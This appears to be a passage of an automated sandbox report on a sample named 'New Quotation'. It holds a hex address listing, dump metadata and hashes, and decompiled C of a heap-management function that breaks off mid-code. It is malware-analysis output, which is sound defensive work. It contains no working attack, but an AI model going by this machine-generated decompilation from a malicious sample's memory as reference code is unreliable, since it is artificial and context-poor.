                                                                                                                                                                                          0x1d81093f
                                                                                                                                                                                          0x1d810941
                                                                                                                                                                                          0x1d810949
                                                                                                                                                                                          0x1d81094a
                                                                                                                                                                                          0x1d81094c
                                                                                                                                                                                          0x1d81094e
                                                                                                                                                                                          0x1d810953
                                                                                                                                                                                          0x1d810957
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d81095d
                                                                                                                                                                                          0x1d81095f
                                                                                                                                                                                          0x1d810964
                                                                                                                                                                                          0x1d810968
                                                                                                                                                                                          0x1d810969
                                                                                                                                                                                          0x1d81096b
                                                                                                                                                                                          0x1d810970
                                                                                                                                                                                          0x1d810974
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d81097a
                                                                                                                                                                                          0x1d81097c
                                                                                                                                                                                          0x1d810984
                                                                                                                                                                                          0x1d810985
                                                                                                                                                                                          0x1d81098c
                                                                                                                                                                                          0x1d81098e
                                                                                                                                                                                          0x1d810990
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d81099c
                                                                                                                                                                                          0x1d8109a1
                                                                                                                                                                                          0x1d8109a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8109ab
                                                                                                                                                                                          0x1d8109ab
                                                                                                                                                                                          0x1d8109af
                                                                                                                                                                                          0x1d8109c0
                                                                                                                                                                                          0x1d8109c2
                                                                                                                                                                                          0x1d8109c8
                                                                                                                                                                                          0x1d8109ce
                                                                                                                                                                                          0x1d8109ce
                                                                                                                                                                                          0x1d8109e5
                                                                                                                                                                                          0x1d8109e7
                                                                                                                                                                                          0x1d8109ef
                                                                                                                                                                                          0x1d849638
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849638
                                                                                                                                                                                          0x1d810a04
                                                                                                                                                                                          0x1d810a09
                                                                                                                                                                                          0x1d810a0d
                                                                                                                                                                                          0x1d810e14
                                                                                                                                                                                          0x1d810e14
                                                                                                                                                                                          0x1d810dde
                                                                                                                                                                                          0x1d810de0
                                                                                                                                                                                          0x1d810e1c
                                                                                                                                                                                          0x1d810e1d
                                                                                                                                                                                          0x1d810e1d
                                                                                                                                                                                          0x1d810de2
                                                                                                                                                                                          0x1d810dee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810dee
                                                                                                                                                                                          0x1d810a17
                                                                                                                                                                                          0x1d810a1d
                                                                                                                                                                                          0x1d84964a
                                                                                                                                                                                          0x1d84964b
                                                                                                                                                                                          0x1d84964c
                                                                                                                                                                                          0x1d84964d
                                                                                                                                                                                          0x1d849654
                                                                                                                                                                                          0x1d84965a
                                                                                                                                                                                          0x1d84965b
                                                                                                                                                                                          0x1d84965c
                                                                                                                                                                                          0x1d84965d
                                                                                                                                                                                          0x1d84965e
                                                                                                                                                                                          0x1d849664
                                                                                                                                                                                          0x1d84966f
                                                                                                                                                                                          0x1d849671
                                                                                                                                                                                          0x1d849673
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849679
                                                                                                                                                                                          0x1d849680
                                                                                                                                                                                          0x1d84976d
                                                                                                                                                                                          0x1d84976d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84976d
                                                                                                                                                                                          0x1d849689
                                                                                                                                                                                          0x1d84968f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849698
                                                                                                                                                                                          0x1d84969e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8496a4
                                                                                                                                                                                          0x1d8496ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8496b1
                                                                                                                                                                                          0x1d8496b4
                                                                                                                                                                                          0x1d8496bf
                                                                                                                                                                                          0x1d8496c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8496ca
                                                                                                                                                                                          0x1d8496d0
                                                                                                                                                                                          0x1d8496d6
                                                                                                                                                                                          0x1d8496d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8496e1
                                                                                                                                                                                          0x1d8496e4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8496ed
                                                                                                                                                                                          0x1d8496f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8496fd
                                                                                                                                                                                          0x1d8496fe
                                                                                                                                                                                          0x1d8496ff
                                                                                                                                                                                          0x1d849708
                                                                                                                                                                                          0x1d84970b
                                                                                                                                                                                          0x1d849711
                                                                                                                                                                                          0x1d849712
                                                                                                                                                                                          0x1d849719
                                                                                                                                                                                          0x1d84971a
                                                                                                                                                                                          0x1d84971b
                                                                                                                                                                                          0x1d84971c
                                                                                                                                                                                          0x1d84971d
                                                                                                                                                                                          0x1d849722
                                                                                                                                                                                          0x1d849728
                                                                                                                                                                                          0x1d84972a
                                                                                                                                                                                          0x1d849730
                                                                                                                                                                                          0x1d849737
                                                                                                                                                                                          0x1d84973d
                                                                                                                                                                                          0x1d849746
                                                                                                                                                                                          0x1d84974d
                                                                                                                                                                                          0x1d849753
                                                                                                                                                                                          0x1d849759
                                                                                                                                                                                          0x1d849765
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849765
                                                                                                                                                                                          0x1d810a23
                                                                                                                                                                                          0x1d810a29
                                                                                                                                                                                          0x1d810a2b
                                                                                                                                                                                          0x1d810a2c
                                                                                                                                                                                          0x1d810a33
                                                                                                                                                                                          0x1d810a35
                                                                                                                                                                                          0x1d810a42
                                                                                                                                                                                          0x1d810a47
                                                                                                                                                                                          0x1d84980f
                                                                                                                                                                                          0x1d849812
                                                                                                                                                                                          0x1d849814
                                                                                                                                                                                          0x1d849816
                                                                                                                                                                                          0x1d849897
                                                                                                                                                                                          0x1d849897
                                                                                                                                                                                          0x1d84989d
                                                                                                                                                                                          0x1d8498a1
                                                                                                                                                                                          0x1d8498ab
                                                                                                                                                                                          0x1d8498a3
                                                                                                                                                                                          0x1d8498a3
                                                                                                                                                                                          0x1d8498a3
                                                                                                                                                                                          0x1d8498b2
                                                                                                                                                                                          0x1d8498b5
                                                                                                                                                                                          0x1d8498ba
                                                                                                                                                                                          0x1d810d03
                                                                                                                                                                                          0x1d810d0d
                                                                                                                                                                                          0x1d810d13
                                                                                                                                                                                          0x1d8498c9
                                                                                                                                                                                          0x1d8498ca
                                                                                                                                                                                          0x1d8498cb
                                                                                                                                                                                          0x1d8498d4
                                                                                                                                                                                          0x1d8498d6
                                                                                                                                                                                          0x1d8498dd
                                                                                                                                                                                          0x1d8498de
                                                                                                                                                                                          0x1d8498df
                                                                                                                                                                                          0x1d8498e4
                                                                                                                                                                                          0x1d8498e6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8498ec
                                                                                                                                                                                          0x1d8498f3
                                                                                                                                                                                          0x1d8498f6
                                                                                                                                                                                          0x1d8498f8
                                                                                                                                                                                          0x1d8498f8
                                                                                                                                                                                          0x1d8498f8
                                                                                                                                                                                          0x1d849906
                                                                                                                                                                                          0x1d849908
                                                                                                                                                                                          0x1d84990e
                                                                                                                                                                                          0x1d810d1f
                                                                                                                                                                                          0x1d810d22
                                                                                                                                                                                          0x1d810d27
                                                                                                                                                                                          0x1d810d2a
                                                                                                                                                                                          0x1d810d2f
                                                                                                                                                                                          0x1d810d32
                                                                                                                                                                                          0x1d810d3a
                                                                                                                                                                                          0x1d810d4d
                                                                                                                                                                                          0x1d810d52
                                                                                                                                                                                          0x1d810d58
                                                                                                                                                                                          0x1d810d5d
                                                                                                                                                                                          0x1d810d5e
                                                                                                                                                                                          0x1d810d5f
                                                                                                                                                                                          0x1d810d60
                                                                                                                                                                                          0x1d810d67
                                                                                                                                                                                          0x1d810d68
                                                                                                                                                                                          0x1d810d69
                                                                                                                                                                                          0x1d810d6a
                                                                                                                                                                                          0x1d810d6b
                                                                                                                                                                                          0x1d810d6c
                                                                                                                                                                                          0x1d810d71
                                                                                                                                                                                          0x1d810d75
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810d7b
                                                                                                                                                                                          0x1d810d7b
                                                                                                                                                                                          0x1d810d83
                                                                                                                                                                                          0x1d810d94
                                                                                                                                                                                          0x1d810d94
                                                                                                                                                                                          0x1d810d9d
                                                                                                                                                                                          0x1d810daf
                                                                                                                                                                                          0x1d810db5
                                                                                                                                                                                          0x1d810dbb
                                                                                                                                                                                          0x1d810dc1
                                                                                                                                                                                          0x1d810dc7
                                                                                                                                                                                          0x1d810dd3
                                                                                                                                                                                          0x1d810dd6
                                                                                                                                                                                          0x1d849961
                                                                                                                                                                                          0x1d849968
                                                                                                                                                                                          0x1d84996f
                                                                                                                                                                                          0x1d84996f
                                                                                                                                                                                          0x1d810ddc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810ddc
                                                                                                                                                                                          0x1d810d85
                                                                                                                                                                                          0x1d810d8e
                                                                                                                                                                                          0x1d849915
                                                                                                                                                                                          0x1d84991b
                                                                                                                                                                                          0x1d849920
                                                                                                                                                                                          0x1d849922
                                                                                                                                                                                          0x1d849922
                                                                                                                                                                                          0x1d849927
                                                                                                                                                                                          0x1d849929
                                                                                                                                                                                          0x1d84992b
                                                                                                                                                                                          0x1d849937
                                                                                                                                                                                          0x1d849939
                                                                                                                                                                                          0x1d849940
                                                                                                                                                                                          0x1d849946
                                                                                                                                                                                          0x1d849947
                                                                                                                                                                                          0x1d849952
                                                                                                                                                                                          0x1d849954
                                                                                                                                                                                          0x1d849956
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84995c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84995c
                                                                                                                                                                                          0x1d849956
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810d8e
                                                                                                                                                                                          0x1d810d75
                                                                                                                                                                                          0x1d810d19
                                                                                                                                                                                          0x1d810d19
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849818
                                                                                                                                                                                          0x1d849818
                                                                                                                                                                                          0x1d849818
                                                                                                                                                                                          0x1d84981d
                                                                                                                                                                                          0x1d849839
                                                                                                                                                                                          0x1d849840
                                                                                                                                                                                          0x1d84984a
                                                                                                                                                                                          0x1d84984c
                                                                                                                                                                                          0x1d849856
                                                                                                                                                                                          0x1d849874
                                                                                                                                                                                          0x1d849874
                                                                                                                                                                                          0x1d849876
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849876
                                                                                                                                                                                          0x1d849858
                                                                                                                                                                                          0x1d849862
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849864
                                                                                                                                                                                          0x1d84986c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849870
                                                                                                                                                                                          0x1d849878
                                                                                                                                                                                          0x1d849878
                                                                                                                                                                                          0x1d84987c
                                                                                                                                                                                          0x1d84988b
                                                                                                                                                                                          0x1d84988d
                                                                                                                                                                                          0x1d84988d
                                                                                                                                                                                          0x1d849891
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d849891
                                                                                                                                                                                          0x1d810a4d
                                                                                                                                                                                          0x1d810a53
                                                                                                                                                                                          0x1d810a53
                                                                                                                                                                                          0x1d810a56
                                                                                                                                                                                          0x1d810a59
                                                                                                                                                                                          0x1d810a63
                                                                                                                                                                                          0x1d849777
                                                                                                                                                                                          0x1d84977b
                                                                                                                                                                                          0x1d84978a
                                                                                                                                                                                          0x1d849797
                                                                                                                                                                                          0x1d84979f
                                                                                                                                                                                          0x1d8497aa
                                                                                                                                                                                          0x1d8497aa
                                                                                                                                                                                          0x1d8497ad
                                                                                                                                                                                          0x1d8497b6
                                                                                                                                                                                          0x1d84977d
                                                                                                                                                                                          0x1d84977d
                                                                                                                                                                                          0x1d84977f
                                                                                                                                                                                          0x1d849782
                                                                                                                                                                                          0x1d849782
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810a69
                                                                                                                                                                                          0x1d810a74
                                                                                                                                                                                          0x1d810a74
                                                                                                                                                                                          0x1d810a78
                                                                                                                                                                                          0x1d810a82
                                                                                                                                                                                          0x1d810a8e
                                                                                                                                                                                          0x1d810a94
                                                                                                                                                                                          0x1d810a9a
                                                                                                                                                                                          0x1d810aa0
                                                                                                                                                                                          0x1d810aa3
                                                                                                                                                                                          0x1d810aa3
                                                                                                                                                                                          0x1d810aa3
                                                                                                                                                                                          0x1d810e06
                                                                                                                                                                                          0x1d810e06
                                                                                                                                                                                          0x1d810aa6
                                                                                                                                                                                          0x1d810aac
                                                                                                                                                                                          0x1d810ab7
                                                                                                                                                                                          0x1d810aca
                                                                                                                                                                                          0x1d810ad6
                                                                                                                                                                                          0x1d810adb
                                                                                                                                                                                          0x1d810ae2
                                                                                                                                                                                          0x1d810aeb
                                                                                                                                                                                          0x1d810af4
                                                                                                                                                                                          0x1d810b01
                                                                                                                                                                                          0x1d8497be
                                                                                                                                                                                          0x1d8497c0
                                                                                                                                                                                          0x1d810b27
                                                                                                                                                                                          0x1d810b27
                                                                                                                                                                                          0x1d810b29
                                                                                                                                                                                          0x1d810b29
                                                                                                                                                                                          0x1d810b2b
                                                                                                                                                                                          0x1d810b2e
                                                                                                                                                                                          0x1d810b38
                                                                                                                                                                                          0x1d810b3e
                                                                                                                                                                                          0x1d810b4a
                                                                                                                                                                                          0x1d810b50
                                                                                                                                                                                          0x1d810b5a
                                                                                                                                                                                          0x1d810b60
                                                                                                                                                                                          0x1d810b66
                                                                                                                                                                                          0x1d810b6f
                                                                                                                                                                                          0x1d810b7b
                                                                                                                                                                                          0x1d810b84
                                                                                                                                                                                          0x1d810b99
                                                                                                                                                                                          0x1d810b9c
                                                                                                                                                                                          0x1d810ba3
                                                                                                                                                                                          0x1d810baa
                                                                                                                                                                                          0x1d810bb6
                                                                                                                                                                                          0x1d810bbc
                                                                                                                                                                                          0x1d810bd4
                                                                                                                                                                                          0x1d810bf3
                                                                                                                                                                                          0x1d810c01
                                                                                                                                                                                          0x1d810c0b
                                                                                                                                                                                          0x1d810c16
                                                                                                                                                                                          0x1d810c1e
                                                                                                                                                                                          0x1d810c27
                                                                                                                                                                                          0x1d810c30
                                                                                                                                                                                          0x1d810c36
                                                                                                                                                                                          0x1d810c39
                                                                                                                                                                                          0x1d810c3c
                                                                                                                                                                                          0x1d810c47
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810c4d
                                                                                                                                                                                          0x1d810c4f
                                                                                                                                                                                          0x1d810c50
                                                                                                                                                                                          0x1d810c55
                                                                                                                                                                                          0x1d810c5a
                                                                                                                                                                                          0x1d810c67
                                                                                                                                                                                          0x1d810c73
                                                                                                                                                                                          0x1d810c87
                                                                                                                                                                                          0x1d810c94
                                                                                                                                                                                          0x1d810c99
                                                                                                                                                                                          0x1d810ca1
                                                                                                                                                                                          0x1d8497c7
                                                                                                                                                                                          0x1d8497cb
                                                                                                                                                                                          0x1d8497dc
                                                                                                                                                                                          0x1d8497e9
                                                                                                                                                                                          0x1d8497f1
                                                                                                                                                                                          0x1d8497fc
                                                                                                                                                                                          0x1d849806
                                                                                                                                                                                          0x1d8497cd
                                                                                                                                                                                          0x1d8497cd
                                                                                                                                                                                          0x1d8497cf
                                                                                                                                                                                          0x1d8497d3
                                                                                                                                                                                          0x1d8497d3
                                                                                                                                                                                          0x1d810cda
                                                                                                                                                                                          0x1d810cdf
                                                                                                                                                                                          0x1d810cfd
                                                                                                                                                                                          0x1d810cff
                                                                                                                                                                                          0x1d810cff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810cfd
                                                                                                                                                                                          0x1d810cb2
                                                                                                                                                                                          0x1d810cb2
                                                                                                                                                                                          0x1d810cb4
                                                                                                                                                                                          0x1d810cb8
                                                                                                                                                                                          0x1d810cba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810e0d
                                                                                                                                                                                          0x1d810e0d
                                                                                                                                                                                          0x1d810cc0
                                                                                                                                                                                          0x1d810cc6
                                                                                                                                                                                          0x1d810ccc
                                                                                                                                                                                          0x1d810cd2
                                                                                                                                                                                          0x1d810cd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d810cd6
                                                                                                                                                                                          0x1d810c47
                                                                                                                                                                                          0x1d810a63
                                                                                                                                                                                          0x1d8109a5

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 45f788cac08956f355f4d196514345c51d8ec53bb821a74d3e7db8c970879193
                                                                                                                                                                                          • Instruction ID: f79e884cb60919363a8910e8b30e9ef54aef5bd3f5aeb79ca81ecffbf881e2b8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 45f788cac08956f355f4d196514345c51d8ec53bb821a74d3e7db8c970879193
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C427D75A00719DFDB61CF28C880BA6B7F5BF04314F1485A9E989DB241DB70E989CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8918DA Relevance: .6, Instructions: 559COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                          			E1D8918DA(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				void* __ebx;
				char* _t197;
				signed int _t201;
				unsigned int _t209;
				char* _t223;
				signed int* _t227;
				signed int _t235;
				signed int _t246;
				signed int _t249;
				intOrPtr* _t250;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed short _t264;
				signed int _t272;
				signed int _t280;
				signed int _t286;
				signed char _t300;
				signed int _t302;
				signed char _t303;
				intOrPtr _t305;
				unsigned int _t306;
				signed int _t307;
				signed char* _t309;
				signed int _t315;
				intOrPtr _t316;
				signed char* _t319;
				void* _t320;
				signed int _t321;
				signed char _t324;
				signed int _t325;
				signed int _t333;
				unsigned int _t345;
				void* _t346;
				signed int _t348;
				signed int _t361;
				void* _t364;
				intOrPtr _t368;
				signed int _t382;
				char _t390;
				intOrPtr _t393;
				unsigned int _t400;
				signed int _t405;
				signed int _t406;
				signed int _t411;
				void* _t412;
				signed char _t414;
				intOrPtr* _t415;
				void* _t417;
				void* _t418;
				intOrPtr _t419;
				intOrPtr _t421;
				signed int _t424;
				signed char _t426;
				intOrPtr* _t427;
				void* _t429;
				intOrPtr* _t432;
				intOrPtr _t435;
				intOrPtr* _t436;
				intOrPtr* _t438;
				intOrPtr* _t443;
				signed int _t447;
				intOrPtr* _t449;
				void* _t450;
				signed int _t454;
				signed int _t455;
				intOrPtr* _t456;
				void* _t457;
				intOrPtr* _t460;
				intOrPtr _t461;
				void* _t462;
				signed int _t463;

				_t302 = 0;
				_t435 = __ecx;
				_v36 = 0;
				_t405 = 0;
				_v32 = __ecx;
				_v40 = 0;
				_t324 = 1;
				do {
					if((_t324 &  *(_t435 + 0x1bf + _t405 * 4)) != 0) {
						if(( *(_t435 + 0x1b8) & _t324) != 0) {
							goto L2;
						}
						_t300 =  *0x1d8c4360; // 0x10
						_v44 = _t300;
						if(_t300 == 0) {
							goto L100;
						}
						L5:
						_t325 = _t302;
						_v60 = _t302;
						do {
							if(_t325 != 0) {
								_t447 = _t325 * 0x68;
								_t325 = _v60;
								_t449 = _t447 + 0xffffff98 +  *((intOrPtr*)(_t435 + 0x5c4 + _t405 * 4));
							} else {
								_t449 =  *((intOrPtr*)(_t435 + 0x3c0 + _t405 * 4));
							}
							if(_t449 != 0 &&  *((intOrPtr*)(_t449 + 0x54)) == 1) {
								_t209 = E1D89124C(_t449, _t325);
								_t306 = _t209;
								if(_t306 == 0) {
									_t302 = 0;
									L97:
									_t405 = _v40;
									_t325 = _v60;
									goto L98;
								}
								 *((intOrPtr*)( *_t449 + 0x14)) = 0;
								_t410 =  *(_t435 + 0xc);
								_t345 = _t306 >> 0x00000003 ^  *0x1d8c6964 ^  *(_t435 + 0xc) ^  *_t306;
								if(_t345 != 0) {
									L92:
									_push(0);
									_push(0);
									_push(0);
									L93:
									_push(_t306);
									_t346 = 3;
									E1D895FED(_t346, _t410);
									L94:
									_t302 = 0;
									L95:
									_t435 = _v32;
									goto L97;
								}
								_t438 =  *((intOrPtr*)(_t209 - (_t345 >> 0xd)));
								_v64 = _t438;
								if(_t438 == 0) {
									goto L92;
								}
								_t348 =  *(_t438 + 4);
								_t411 =  *(_t306 + 4) >> 0x00000008 & 0x0000ffff;
								_v48 = 0;
								_v56 = _t348;
								_v52 = _t411;
								_t454 =  *( *((intOrPtr*)( *_t438)) + 0xc);
								if((( *(_t348 + 0x10) ^ _t454 ^  *0x1d8c6964 ^ _t348) & 0x0000ffff) + (( *(_t348 + 0x10) ^ _t454 ^  *0x1d8c6964 ^ _t348) >> 0x10) * _t411 + _v56 == _t306) {
									if(E1D7E3C40() == 0) {
										_t223 = 0x7ffe0380;
									} else {
										_t223 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									if( *_t223 != 0 && ( *( *[fs:0x30] + 0x240) & 1) != 0) {
										_t40 = _t306 + 8; // 0x8
										E1D88F247( *(_t454 + 0xc), _t40, 2);
									}
									asm("sbb eax, eax");
									_v20 = 0;
									_t412 = 0;
									_t42 = _t438 + 0x10; // 0x10
									_t227 = _t42;
									_v24 = _t227;
									while(1) {
										_t455 =  *_t227;
										_v28 = _t455;
										if((_t455 >> 0x00000010 & 0x00008000) != 0) {
											goto L26;
										}
										L25:
										asm("lock cmpxchg [edi], ecx");
										_t438 = _v64;
										if(_t455 == _t455) {
											L28:
											 *((char*)(_t306 + 7)) = 0x80;
											if(_t455 != 0xffffffff) {
												_t307 = _v52;
												asm("btr [eax], ebx");
												if( *((intOrPtr*)(_t438 + 0xc)) == 0) {
													L36:
													_t456 =  *_t438;
													_t235 = (_t455 & 0x0000ffff) + _v48 + 0x00000001 | _t307 << 0x00000010;
													if(_t235 !=  *(_t438 + 0x18)) {
														L74:
														_t138 = _t438 + 0x1c; // 0x1c
														_t309 = _t138;
														 *(_t438 + 0x10) = _t235;
														if(( *_t309 & 0x00000002) == 0 && E1D7E3AF6(_t456, _t438) != 0) {
															while(1) {
																_t414 =  *_t309;
																if(_t414 == 0 || (_t414 & 0x00000002) != 0) {
																	goto L94;
																}
																asm("lock cmpxchg [ebx], ecx");
																if(_t414 != _t414) {
																	continue;
																}
																_t361 =  *_t438;
																_v28 = _t361;
																_t457 = 0;
																do {
																	_t415 =  *((intOrPtr*)(_t361 + ((( *(_t361 + 0x5e) & 0x0000ffff) + _t457 & 0x0000000f) + 2) * 4));
																	if(_t415 != 0) {
																		if(( *(_t415 + 0x1c) & 0x00000001) != 0) {
																			goto L86;
																		}
																		asm("lock cmpxchg [ebx], ecx");
																		if(_t415 == _t415) {
																			_t315 = 0xfffffffd;
																			_t246 =  *(_t415 + 0x1c);
																			do {
																				asm("lock cmpxchg [esi], ecx");
																			} while ((_t246 & _t315) != 0);
																			_t302 = 0;
																			if(_t246 != 2) {
																				goto L95;
																			}
																			_t368 =  *((intOrPtr*)( *_t415));
																			 *_t415 = 0;
																			_t418 = _t415 + 0x20;
																			L69:
																			E1D7E20E0(_t368, _t418);
																			goto L95;
																		}
																		L85:
																		_t361 = _v28;
																		goto L86;
																	}
																	asm("lock cmpxchg [ebx], ecx");
																	if(0 == 0) {
																		goto L94;
																	}
																	goto L85;
																	L86:
																	_t457 = _t457 + 1;
																} while (_t457 < 0x10);
																_t157 = _t438 + 0x20; // 0x20
																_t417 = _t157;
																_t364 =  *((intOrPtr*)( *( *((intOrPtr*)( *_t438)) + 0xc) + 0x3c0 + ( *( *_t438 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																L30:
																E1D7E20E0(_t364, _t417);
																goto L94;
															}
														}
														goto L94;
													}
													_t316 =  *((intOrPtr*)(_t456 + 0x58));
													_t419 =  *((intOrPtr*)( *_t456 + 0x10));
													if( *((intOrPtr*)(_t456 + 0x54)) != 1 || _t419 < _t316 || _t419 - _t316 >=  *((intOrPtr*)( *_t456 + 0x14))) {
														_t249 =  *_t438;
														_v52 = _t249;
														_t250 = _t249 + 4;
														_t460 =  *_t250;
														 *_t250 = 0;
														if(_t460 == 0) {
															L60:
															_t461 =  *_t438;
															_t317 =  *( *_v52 + 0xc);
															_v24 =  *( *_v52 + 0xc);
															if(( *(_t438 + 0x16) & 0x00000003) != 0) {
																_v12 =  *(_t438 + 4) + 0x0000101f & 0xfffff000;
																_t264 = E1D890E2D(_t438);
																_push( &_v8);
																_t382 = ( *(_t438 + 0x18) & 0x0000ffff) * (_t264 & 0x0000ffff) << 3;
																_v16 = _t382;
																_push(_t382);
																_push(E1D7CF0E1(_t317[3], 1));
																_push( &_v16);
																_push( &_v12);
																_push(0xffffffff);
																E1D812EB0();
															}
															 *((intOrPtr*)( *(_t438 + 4) + 0xc)) = 0;
															E1D7E252B(_t317,  *(_t438 + 4), 0);
															_t255 =  *(_t438 + 0x18) & 0x0000ffff;
															_v52 = _t255;
															_t120 = _t461 + 0x50; // 0x50
															_t256 = _t120;
															_v52 =  ~_t255;
															_v56 = _t256;
															do {
																_t462 =  *_t256;
																_t421 =  *((intOrPtr*)(_t256 + 4));
																_v20 = _t421;
																asm("lock cmpxchg8b [edi]");
																_t256 = _v52;
															} while (_t462 != _t462 || _t421 != _v20);
															_t443 = _v64;
															_t302 = 0;
															 *((intOrPtr*)(_t443 + 4)) = 0;
															asm("lock inc dword [eax+0x20]");
															 *((intOrPtr*)(_t443 + 0x10)) = 0;
															_t135 = _t443 + 0x1c; // 0x1c
															_t463 = 0xfffffffe;
															_t259 =  *_t135;
															do {
																asm("lock cmpxchg [edx], ecx");
															} while ((_t259 & _t463) != 0);
															if(_t259 != 1) {
																goto L95;
															}
															_t136 = _t443 + 0x20; // 0x20
															_t418 = _t136;
															_t368 =  *((intOrPtr*)( *_t443));
															 *_t443 = 0;
															goto L69;
														}
														_t77 = _t460 + 0x1c; // 0x1c
														_t319 = _t77;
														_t424 = 0xfffffff9;
														_t272 =  *_t319;
														do {
															asm("lock cmpxchg [ebx], ecx");
														} while ((_t272 & _t424) != 0);
														if(_t272 != 6) {
															if(E1D7E3AF6(_v52, _t460) == 0) {
																goto L60;
															} else {
																goto L46;
															}
															while(1) {
																L46:
																_t426 =  *_t319;
																if(_t426 == 0 || (_t426 & 0x00000002) != 0) {
																	goto L60;
																}
																asm("lock cmpxchg [ebx], ecx");
																if(_t426 != _t426) {
																	continue;
																}
																_t390 =  *_t460;
																_v48 = _t390;
																_t320 = 0;
																do {
																	_t280 = _t390 + ((( *(_t390 + 0x5e) & 0x0000ffff) + _t320 & 0x0000000f) + 2) * 4;
																	_t427 =  *_t280;
																	_v28 = _t280;
																	if(_t427 != 0) {
																		if(( *(_t427 + 0x1c) & 0x00000001) != 0) {
																			goto L56;
																		}
																		asm("lock cmpxchg [edi], ecx");
																		_t438 = _v64;
																		if(_t427 == _t427) {
																			_t321 = 0xfffffffd;
																			_t286 =  *(_t427 + 0x1c);
																			do {
																				asm("lock cmpxchg [esi], ecx");
																			} while ((_t286 & _t321) != 0);
																			if(_t286 != 2) {
																				goto L60;
																			}
																			_t393 =  *((intOrPtr*)( *_t427));
																			 *_t427 = 0;
																			_t429 = _t427 + 0x20;
																			L59:
																			E1D7E20E0(_t393, _t429);
																			goto L60;
																		}
																		L55:
																		_t390 = _v48;
																		goto L56;
																	}
																	asm("lock cmpxchg [edx], ecx");
																	if(0 == 0) {
																		goto L60;
																	}
																	goto L55;
																	L56:
																	_t320 = _t320 + 1;
																} while (_t320 < 0x10);
																_t393 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t460)) + 0xc)) + 0x3c0 + ( *( *_t460 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																L58:
																_t99 = _t460 + 0x20; // 0x20
																_t429 = _t99;
																goto L59;
															}
															goto L60;
														}
														_t393 =  *((intOrPtr*)( *_t460));
														 *_t460 = 0;
														goto L58;
													} else {
														goto L74;
													}
												}
												_t59 = _t438 + 8; // 0x8
												_t432 = E1D85E9F6(_t59);
												if(_t432 == 0) {
													goto L36;
												}
												do {
													_t400 =  *(_t432 - 4);
													_t432 =  *_t432;
													asm("btr [eax], edi");
